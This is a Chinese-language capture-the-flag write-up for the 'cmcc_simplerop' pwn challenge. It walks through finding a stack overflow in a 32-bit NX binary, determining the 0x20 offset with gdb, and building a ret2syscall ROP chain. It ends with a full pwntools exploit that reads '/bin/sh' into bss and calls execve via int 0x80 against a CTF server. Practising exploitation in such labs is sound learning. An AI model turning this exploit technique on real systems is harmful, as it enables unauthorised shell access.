cmcc_simplerop
步骤
- 例行检查,32位,开启了nx保护
- 本地试运行一下程序,查看一下大概的情况
- 32位ida载入,习惯性的检索程序里的字符串,看了个寂寞,从main函数开始看程序
参数v4明显的溢出漏洞
对于这种开启了nx保护没有可以利用函数的题,我一般都是利用ret2libc的方法,但是这道题,我查plt表里,居然没有之前调用过的函数的地址,
在参考了其他师傅的wp之后知道了这题是利用的ret2syscall,binsh可以直接写入bss段,这位师傅还在程序里发现了mprotect函数,另一种解法是利用它修改堆栈的权限,直接写入shellcode,
我这边主要记录了一下ret2syscall的方法
- 先找一下函数里可以使用的命令
首先就是可以看见有int 0x80,我们可以系统调用,关于系统调用的指令,我们可以参考这个博客,总结的很全。
我们要执行system/execve(‘/bin/sh’)来获取shell,系统调用的指令的话就是
int80(11,"/bin/sh")
找一下设置各个寄存器的指令
由于没有找到单独的pop ebx;ret,加上调用read函数要用到三个寄存器,就用的pop edx;pop ecx;pop ebx;ret,多设置两个寄存器,给它设置随意一个值就好了,
这题没有找到/bin/sh字符串,只能手动输入了,由于系统已经调用过read函数了,我们可以直接利用read函数往bss段或者data段读入/bin/sh
这题有一个坑,ida分析的偏移是0x14+4,自己一开始写的时候出错,找了半天没搞懂错哪儿了,看了其他师傅的wp才知道这题的偏移是0x20
gdb调试测试偏移量,cyclic 200 随机生成长度为200的字符串
运行程序,输入之前生成的字符串,在0x61616169处报错,算一下之前字符串的长度,找到偏移量为32(0x20)
完整EXP:
from pwn import *
context_log_level='debug'
p=remote('node3.buuoj.cn',25509)
#p = process('./simplerop')
int_addr = 0x080493e1
pop_eax = 0x080bae06
read_addr= 0x0806CD50
binsh_addr = 0x080EB584
pop_edx_ecx_ebx = 0x0806e850
payload = 'a'*0x20 + p32(read_addr) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8)
payload += p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh_addr) + p32(int_addr)
p.sendline(payload)
p.send('/bin/sh\x00')
p.interactive()